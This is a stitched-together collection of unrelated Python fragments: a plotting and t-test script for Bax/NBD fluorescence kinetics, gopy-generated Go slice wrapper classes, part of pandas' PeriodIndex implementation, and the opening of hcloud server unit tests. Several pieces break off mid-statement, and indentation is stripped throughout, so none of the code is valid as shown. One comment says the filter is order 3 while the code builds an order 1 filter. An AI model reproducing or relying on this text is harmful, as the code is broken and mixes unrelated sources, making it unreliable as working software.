label=r'$\frac{d}{dt}$ Tb')
ax.set_xlabel('Time (sec)')
ax.set_ylabel(r'\% Max Rate')
#ax.set_title('%s, NBD-%s-Bax normalized derivative' % (activator, nbd_site))
ax.set_ylim(-0.25, 1.1)
(xmin, xmax) = (0, 2000)
ax.set_xlim(xmin, xmax)
plt.hlines(0, xmin, xmax, linestyle='-')
plt.subplots_adjust(left=0.27, bottom=0.19)
plt.legend(loc='upper right', fontsize=fontsize, frameon=False)
ymin, ymax = plt.ylim()
format_axis(ax)
if plot_tb_peak:
plt.vlines(peak_pt, ymin, ymax, color='gray', alpha=0.5)
if plot_filename:
plt.savefig('%s.pdf' % plot_filename)
plt.savefig('%s.png' % plot_filename, dpi=300)
def plot_derivatives(df, nbd_sites, normalize_nbd=False):
replicates = range(1, 4)
num_pts = 4
window = 1 # For moving average
activators = ['Bid', 'Bim']
# Create an order 3 lowpass butterworth filter.
b, a = scipy.signal.butter(1, 0.2)
for nbd_index, nbd_site in enumerate(nbd_sites):
for activator in activators:
# We store the list of timepoints where the release derivative
# reaches its peak so that we can plot lines for all three with
# the same upper and lower y-coordinates.
peak_pts = []
for rep_index in replicates:
rt = df[(activator, 'Release', nbd_site,
rep_index, 'TIME')].values
ry = df[(activator, 'Release', nbd_site,
rep_index, 'VALUE')].values
# Filter the timecourse
r_filt = scipy.signal.filtfilt(b, a, ry)
r_avg = moving_average(r_filt, n=window)
# Take the derivative
r_diff = np.diff(r_avg)
# See comment in calc_release_peaks, above
r_max_tpt = np.argmax(r_diff) + 1
peak_pts.append(rt[r_max_tpt])
# Calculate max NBD slope, but not for WT
if nbd_site != 'WT':
nt = df[(activator, 'NBD', nbd_site,
rep_index, 'TIME')].values
ny = df[(activator, 'NBD', nbd_site,
rep_index, 'VALUE')].values
# Normalize NBD to F/F0
if normalize_nbd:
ny = ny / float(ny[0])
# Filter
n_filt = scipy.signal.filtfilt(b, a, ny)
n_avg = moving_average(n_filt, n=window)
# Take derivative
n_diff = np.diff(n_avg)
# Terbium subplot
plt.figure('%s, NBD-%s-Bax derivative' % (activator, nbd_site),
figsize=(12, 5))
plt.subplot(1, 2, 1)
plt.plot(rt[1+window-1:], r_diff, color=rep_colors[rep_index],
label='%s Rep %d' % (activator, rep_index))
plt.ylabel('dRel/dt (% rel $sec^{-1}$)')
plt.title('%s, NBD-%s-Bax, Tb derivative' %
(activator, nbd_site))
plt.legend(loc='upper right')
if nbd_site != 'WT':
# NBD subplot
plt.subplot(1, 2, 2)
plt.plot(nt[1+window-1:], n_diff,
color=rep_colors[rep_index],
label='%s Rep %d' % (activator, rep_index))
plt.xlabel('Time (sec)')
plt.ylabel(r'dNBD/dt ($F/F_0\ sec^{-1}$)')
plt.title('%s, NBD-%s-Bax, NBD derivative' %
(activator, nbd_site))
plt.legend(loc='upper right')
# Plot normalized derivatives
plt.figure('%s, NBD-%s-Bax normalized derivative' %
(activator, nbd_site))
n_diff_norm = n_diff / np.max(np.abs(n_diff))
r_diff_norm = r_diff / np.max(np.abs(r_diff))
plt.plot(rt[1+window-1:], r_diff_norm,
color=rep_colors[rep_index],
linestyle=line_styles[2],
label='%s Rep %d' % (activator, rep_index))
plt.plot(nt[1+window-1:], n_diff_norm,
color=rep_colors[rep_index],
linestyle=line_styles[3])
plt.xlabel('Time (sec)')
plt.ylabel('% max rate')
plt.title('%s, NBD-%s-Bax normalized derivative' %
(activator, nbd_site))
plt.legend(loc='upper right')
# Add vertical lines to the normalized derivative plot
plt.figure('%s, NBD-%s-Bax normalized derivative' %
(activator, nbd_site))
ymin, ymax = plt.ylim()
plt.vlines(peak_pts, ymin, ymax)
# Call tight_layout for the Tb/NBD 2-panel figure
plt.figure('%s, NBD-%s-Bax derivative' % (activator, nbd_site))
plt.tight_layout()
def welch_t_test(means1, sds1, means2, sds2):
n1 = 3
n2 = 3
t_numer = means1 - means2
sq_sum = ((sds1**2)/n1) + ((sds2**2)/n2)
t_denom = np.sqrt(sq_sum)
t = t_numer / t_denom
print(t)
v_numer = sq_sum ** 2
v1 = n1 - 1.0
v2 = n2 - 1.0
v_denom = ((sds1 ** 4) / ((n1**2) * v1)) + ((sds2 ** 4) / ((n2**2) * v2))
v = v_numer / v_denom
print(v)
p_val = scipy.stats.t.sf(t, v)
print(p_val)
def student_t_test(means1, sds1, means2, sds2, n):
n = float(n)
t_numer = np.abs(means1 - means2)
sx1x2 = np.sqrt(0.5*(sds1**2 + sds2**2))
t_denom = sx1x2 * np.sqrt(2/n)
t = t_numer / t_denom
print(t)
p_val = scipy.stats.t.sf(t, 2 * n - 2)
print(p_val * 2)
return p_val * 2
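# Illustrative sketch (not part of the original analysis): comparing two hypothetical
# sets of mean release values, three replicates each, with the two-sample t-test
# defined above. The numbers are made up purely to show the calling convention.
def _example_t_test():
    means_a = np.array([0.52])
    sds_a = np.array([0.05])
    means_b = np.array([0.61])
    sds_b = np.array([0.04])
    return student_t_test(means_a, sds_a, means_b, sds_b, n=3)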
# -- Model fits --
params_dict = {'c1_to_c2_k': 1e-4, 'c1_scaling': 2,
'c0_to_c1_k': 2e-3}
def plot_2conf_fits(df, nbd_sites, activator, dtype='NBD', replicates=None,
normalize_nbd=False):
if replicates is None:
replicates = range(1, 4)
fit_results = []
# Filter out the WT residue, if present in the list
nbd_sites_filt = [s for s in | |
go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []string
class Slice_string(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=arg: a Go-side object is always initialized with an explicit handle argument;
otherwise the parameter is a Python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_string_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_string.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_string len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_string([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_string_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step is None or key.step == 1:
st = key.start
ed = key.stop
if st is None:
st = 0
if ed is None:
ed = _tsubasa.Slice_string_len(self.handle)
return Slice_string(handle=_tsubasa.Slice_string_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_string_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_string_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_string.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_string_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_string_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
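# Illustrative usage sketch (not emitted by gopy): how a generated slice wrapper is
# typically used from Python. It assumes the _tsubasa extension module has been
# built and imported as part of this package.
def _example_slice_string_usage():
    names = Slice_string(["alice", "bob"])  # copies a Python list into a Go []string
    names.append("carol")                   # appends on the Go side
    first_two = names[0:2]                  # sub-slicing returns another Slice_string
    return [str(n) for n in first_two]      # iteration hands elements back as Python str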
# Python type for slice []uint
class Slice_uint(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=arg: a Go-side object is always initialized with an explicit handle argument;
otherwise the parameter is a Python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step is None or key.step == 1:
st = key.start
ed = key.stop
if st is None:
st = 0
if ed is None:
ed = _tsubasa.Slice_uint_len(self.handle)
return Slice_uint(handle=_tsubasa.Slice_uint_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint16
class Slice_uint16(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=arg: a Go-side object is always initialized with an explicit handle argument;
otherwise the parameter is a Python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint16_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint16.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint16 len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint16([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint16_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step is None or key.step == 1:
st = key.start
ed = key.stop
if st is None:
st = 0
if ed is None:
ed = _tsubasa.Slice_uint16_len(self.handle)
return Slice_uint16(handle=_tsubasa.Slice_uint16_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint16_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint16_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint16.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint16_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint16_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint32
class Slice_uint32(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=arg: a Go-side object is always initialized with an explicit handle argument;
otherwise the parameter is a Python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint32_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint32.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint32 len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint32([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint32_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step is None or key.step == 1:
st = key.start
ed = key.stop
if st is None:
st = 0
if ed is None:
ed = _tsubasa.Slice_uint32_len(self.handle)
return Slice_uint32(handle=_tsubasa.Slice_uint32_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint32_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint32_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint32.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint32_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint32_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint64
class Slice_uint64(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=arg: a Go-side object is always initialized with an explicit handle argument;
otherwise the parameter is a Python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint64_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint64.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint64 len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint64([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint64_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step is None or key.step == 1:
st = key.start
ed = key.stop
if st is None:
st = 0
if ed is None:
ed = _tsubasa.Slice_uint64_len(self.handle)
return Slice_uint64(handle=_tsubasa.Slice_uint64_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint64_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint64_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint64.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint64_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint64_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint8
class Slice_uint8(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=arg: a Go-side object is always initialized with an explicit handle argument;
otherwise the parameter is a Python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 | |
cannot be raised
# from here because numpy catches.
raise ValueError(msg.format(func.__name__))
if is_bool_dtype(result):
return result
# the result is object dtype array of Period
# cannot pass _simple_new as it is
return PeriodIndex(result, freq=self.freq, name=self.name)
@property
def _box_func(self):
return lambda x: Period._from_ordinal(ordinal=x, freq=self.freq)
def _to_embed(self, keep_tz=False):
"""
return an array repr of this object, potentially casting to object
"""
return self.asobject.values
@property
def _formatter_func(self):
return lambda x: "'%s'" % x
def asof_locs(self, where, mask):
"""
where : array of timestamps
mask : array of booleans where data is not NA
"""
where_idx = where
if isinstance(where_idx, DatetimeIndex):
where_idx = PeriodIndex(where_idx.values, freq=self.freq)
locs = self._values[mask].searchsorted(where_idx._values, side='right')
locs = np.where(locs > 0, locs - 1, 0)
result = np.arange(len(self))[mask].take(locs)
first = mask.argmax()
result[(locs == 0) & (where_idx._values < self._values[first])] = -1
return result
@Appender(_index_shared_docs['astype'])
def astype(self, dtype, copy=True, how='start'):
dtype = pandas_dtype(dtype)
if is_object_dtype(dtype):
return self.asobject
elif is_integer_dtype(dtype):
if copy:
return self._int64index.copy()
else:
return self._int64index
elif is_datetime64_dtype(dtype):
return self.to_timestamp(how=how)
elif is_datetime64tz_dtype(dtype):
return self.to_timestamp(how=how).tz_localize(dtype.tz)
elif is_period_dtype(dtype):
return self.asfreq(freq=dtype.freq)
raise ValueError('Cannot cast PeriodIndex to dtype %s' % dtype)
@Substitution(klass='PeriodIndex')
@Appender(_shared_docs['searchsorted'])
@deprecate_kwarg(old_arg_name='key', new_arg_name='value')
def searchsorted(self, value, side='left', sorter=None):
if isinstance(value, Period):
if value.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, value.freqstr)
raise IncompatibleFrequency(msg)
value = value.ordinal
elif isinstance(value, compat.string_types):
value = Period(value, freq=self.freq).ordinal
return self._values.searchsorted(value, side=side, sorter=sorter)
@property
def is_all_dates(self):
return True
@property
def is_full(self):
"""
Returns True if there are no missing periods from start to end
"""
if len(self) == 0:
return True
if not self.is_monotonic:
raise ValueError('Index is not monotonic')
values = self.values
return ((values[1:] - values[:-1]) < 2).all()
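# For example (illustrative, not a doctest from pandas):
#   PeriodIndex(['2000-01', '2000-02', '2000-03'], freq='M').is_full  -> True
#   PeriodIndex(['2000-01', '2000-03'], freq='M').is_full             -> False (2000-02 is missing)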
def asfreq(self, freq=None, how='E'):
"""
Convert the PeriodIndex to the specified frequency `freq`.
Parameters
----------
freq : str
a frequency
how : str {'E', 'S'}
'E', 'END', or 'FINISH' for end,
'S', 'START', or 'BEGIN' for start.
Whether the elements should be aligned to the end
or start within a period. January 31st ('END') vs.
January 1st ('START'), for example.
Returns
-------
new : PeriodIndex with the new frequency
Examples
--------
>>> pidx = pd.period_range('2010-01-01', '2015-01-01', freq='A')
>>> pidx
<class 'pandas.tseries.period.PeriodIndex'>
[2010, ..., 2015]
Length: 6, Freq: A-DEC
>>> pidx.asfreq('M')
<class 'pandas.tseries.period.PeriodIndex'>
[2010-12, ..., 2015-12]
Length: 6, Freq: M
>>> pidx.asfreq('M', how='S')
<class 'pandas.tseries.period.PeriodIndex'>
[2010-01, ..., 2015-01]
Length: 6, Freq: M
"""
how = _validate_end_alias(how)
freq = Period._maybe_convert_freq(freq)
base1, mult1 = _gfc(self.freq)
base2, mult2 = _gfc(freq)
asi8 = self.asi8
# mult1 can't be negative or 0
end = how == 'E'
if end:
ordinal = asi8 + mult1 - 1
else:
ordinal = asi8
new_data = period.period_asfreq_arr(ordinal, base1, base2, end)
if self.hasnans:
new_data[self._isnan] = tslib.iNaT
return self._simple_new(new_data, self.name, freq=freq)
def to_datetime(self, dayfirst=False):
"""
DEPRECATED: use :meth:`to_timestamp` instead.
Cast to DatetimeIndex.
"""
warnings.warn("to_datetime is deprecated. Use self.to_timestamp(...)",
FutureWarning, stacklevel=2)
return self.to_timestamp()
year = _field_accessor('year', 0, "The year of the period")
month = _field_accessor('month', 3, "The month as January=1, December=12")
day = _field_accessor('day', 4, "The days of the period")
hour = _field_accessor('hour', 5, "The hour of the period")
minute = _field_accessor('minute', 6, "The minute of the period")
second = _field_accessor('second', 7, "The second of the period")
weekofyear = _field_accessor('week', 8, "The week ordinal of the year")
week = weekofyear
dayofweek = _field_accessor('dayofweek', 10,
"The day of the week with Monday=0, Sunday=6")
weekday = dayofweek
dayofyear = day_of_year = _field_accessor('dayofyear', 9,
"The ordinal day of the year")
quarter = _field_accessor('quarter', 2, "The quarter of the date")
qyear = _field_accessor('qyear', 1)
days_in_month = _field_accessor('days_in_month', 11,
"The number of days in the month")
daysinmonth = days_in_month
@property
def is_leap_year(self):
""" Logical indicating if the date belongs to a leap year """
return tslib._isleapyear_arr(self.year)
@property
def start_time(self):
return self.to_timestamp(how='start')
@property
def end_time(self):
return self.to_timestamp(how='end')
def _mpl_repr(self):
# how to represent ourselves to matplotlib
return self.asobject.values
def to_timestamp(self, freq=None, how='start'):
"""
Cast to DatetimeIndex
Parameters
----------
freq : string or DateOffset, default 'D' for week or longer, 'S'
otherwise
Target frequency
how : {'s', 'e', 'start', 'end'}
Returns
-------
DatetimeIndex
"""
how = _validate_end_alias(how)
if freq is None:
base, mult = _gfc(self.freq)
freq = frequencies.get_to_timestamp_base(base)
else:
freq = Period._maybe_convert_freq(freq)
base, mult = _gfc(freq)
new_data = self.asfreq(freq, how)
new_data = period.periodarr_to_dt64arr(new_data._values, base)
return DatetimeIndex(new_data, freq='infer', name=self.name)
def _maybe_convert_timedelta(self, other):
if isinstance(other, (timedelta, np.timedelta64, offsets.Tick)):
offset = frequencies.to_offset(self.freq.rule_code)
if isinstance(offset, offsets.Tick):
nanos = tslib._delta_to_nanoseconds(other)
offset_nanos = tslib._delta_to_nanoseconds(offset)
if nanos % offset_nanos == 0:
return nanos // offset_nanos
elif isinstance(other, offsets.DateOffset):
freqstr = other.rule_code
base = frequencies.get_base_alias(freqstr)
if base == self.freq.rule_code:
return other.n
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
elif isinstance(other, np.ndarray):
if is_integer_dtype(other):
return other
elif is_timedelta64_dtype(other):
offset = frequencies.to_offset(self.freq)
if isinstance(offset, offsets.Tick):
nanos = tslib._delta_to_nanoseconds(other)
offset_nanos = tslib._delta_to_nanoseconds(offset)
if (nanos % offset_nanos == 0).all():
return nanos // offset_nanos
elif is_integer(other):
# integer is passed to .shift via
# _add_datetimelike_methods basically
# but ufunc may pass integer to _add_delta
return other
# raise when input doesn't have freq
msg = "Input has different freq from PeriodIndex(freq={0})"
raise IncompatibleFrequency(msg.format(self.freqstr))
def _add_delta(self, other):
ordinal_delta = self._maybe_convert_timedelta(other)
return self.shift(ordinal_delta)
def _sub_datelike(self, other):
if other is tslib.NaT:
new_data = np.empty(len(self), dtype=np.int64)
new_data.fill(tslib.iNaT)
return TimedeltaIndex(new_data, name=self.name)
return NotImplemented
def _sub_period(self, other):
if self.freq != other.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
asi8 = self.asi8
new_data = asi8 - other.ordinal
if self.hasnans:
new_data = new_data.astype(np.float64)
new_data[self._isnan] = np.nan
# result must be Int64Index or Float64Index
return Index(new_data, name=self.name)
def shift(self, n):
"""
Specialized shift which produces a PeriodIndex
Parameters
----------
n : int
Periods to shift by
Returns
-------
shifted : PeriodIndex
"""
values = self._values + n * self.freq.n
if self.hasnans:
values[self._isnan] = tslib.iNaT
return PeriodIndex(data=values, name=self.name, freq=self.freq)
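# Illustrative usage sketch (not a pandas doctest): shifting a monthly index by two
# whole periods of its own frequency.
#   pidx = pd.period_range('2000-01', periods=3, freq='M')
#   pidx.shift(2)  # -> periods 2000-03, 2000-04, 2000-05; NaT entries stay NaT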
@cache_readonly
def dtype(self):
return PeriodDtype.construct_from_string(self.freq)
@property
def inferred_type(self):
# b/c data is represented as ints make sure we can't have ambiguous
# indexing
return 'period'
def get_value(self, series, key):
"""
Fast lookup of value from 1-dimensional ndarray. Only use this if you
know what you're doing
"""
s = com._values_from_object(series)
try:
return com._maybe_box(self,
super(PeriodIndex, self).get_value(s, key),
series, key)
except (KeyError, IndexError):
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
grp = frequencies.Resolution.get_freq_group(reso)
freqn = frequencies.get_freq_group(self.freq)
vals = self._values
# if our data is higher resolution than requested key, slice
if grp < freqn:
iv = Period(asdt, freq=(grp, 1))
ord1 = iv.asfreq(self.freq, how='S').ordinal
ord2 = iv.asfreq(self.freq, how='E').ordinal
if ord2 < vals[0] or ord1 > vals[-1]:
raise KeyError(key)
pos = np.searchsorted(self._values, [ord1, ord2])
key = slice(pos[0], pos[1] + 1)
return series[key]
elif grp == freqn:
key = Period(asdt, freq=self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
else:
raise KeyError(key)
except TypeError:
pass
key = Period(key, self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
@Appender(_index_shared_docs['get_indexer'] % _index_doc_kwargs)
def get_indexer(self, target, method=None, limit=None, tolerance=None):
target = _ensure_index(target)
if hasattr(target, 'freq') and target.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, target.freqstr)
raise IncompatibleFrequency(msg)
if isinstance(target, PeriodIndex):
target = target.asi8
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance)
return Index.get_indexer(self._int64index, target, method,
limit, tolerance)
def _get_unique_index(self, dropna=False):
"""
wrap Index._get_unique_index to handle NaT
"""
res = super(PeriodIndex, self)._get_unique_index(dropna=dropna)
if dropna:
res = res.dropna()
return res
def get_loc(self, key, method=None, tolerance=None):
"""
Get integer location for requested label
Returns
-------
loc : int
"""
try:
return self._engine.get_loc(key)
except KeyError:
if is_integer(key):
raise
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
key = asdt
except TypeError:
pass
try:
key = Period(key, freq=self.freq)
except ValueError:
# we cannot construct the Period
# as we have an invalid type
raise KeyError(key)
try:
ordinal = tslib.iNaT if key is tslib.NaT else key.ordinal
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance)
return self._int64index.get_loc(ordinal, method, tolerance)
except KeyError:
raise KeyError(key)
def _maybe_cast_slice_bound(self, label, side, kind):
"""
If label is a string or a datetime, cast it to Period.ordinal according
to resolution.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
bound : Period or object
Notes
-----
Value of `side` parameter should be validated in caller.
"""
assert kind in ['ix', 'loc', 'getitem']
if isinstance(label, datetime):
return Period(label, freq=self.freq)
elif isinstance(label, compat.string_types):
try:
| |
import mock
import pytest
from hcloud.firewalls.client import BoundFirewall
from hcloud.firewalls.domain import Firewall
from hcloud.floating_ips.client import BoundFloatingIP
from hcloud.isos.client import BoundIso
from hcloud.servers.client import ServersClient, BoundServer
from hcloud.servers.domain import (
Server,
PublicNetwork,
IPv4Address,
IPv6Network,
PublicNetworkFirewall,
PrivateNet,
)
from hcloud.volumes.client import BoundVolume
from hcloud.volumes.domain import Volume
from hcloud.images.domain import Image
from hcloud.images.client import BoundImage
from hcloud.isos.domain import Iso
from hcloud.datacenters.client import BoundDatacenter
from hcloud.datacenters.domain import Datacenter
from hcloud.locations.domain import Location
from hcloud.actions.client import BoundAction
from hcloud.server_types.client import BoundServerType
from hcloud.server_types.domain import ServerType
from hcloud.networks.domain import Network
from hcloud.networks.client import BoundNetwork
from hcloud.placement_groups.domain import PlacementGroup
from hcloud.placement_groups.client import BoundPlacementGroup
class TestBoundServer(object):
@pytest.fixture()
def bound_server(self, hetzner_client):
return BoundServer(client=hetzner_client.servers, data=dict(id=14))
def test_bound_server_init(self, response_full_server):
bound_server = BoundServer(
client=mock.MagicMock(), data=response_full_server["server"]
)
assert bound_server.id == 42
assert bound_server.name == "my-server"
assert bound_server.primary_disk_size == 20
assert isinstance(bound_server.public_net, PublicNetwork)
assert isinstance(bound_server.public_net.ipv4, IPv4Address)
assert bound_server.public_net.ipv4.ip == "172.16.58.3"
assert bound_server.public_net.ipv4.blocked is False
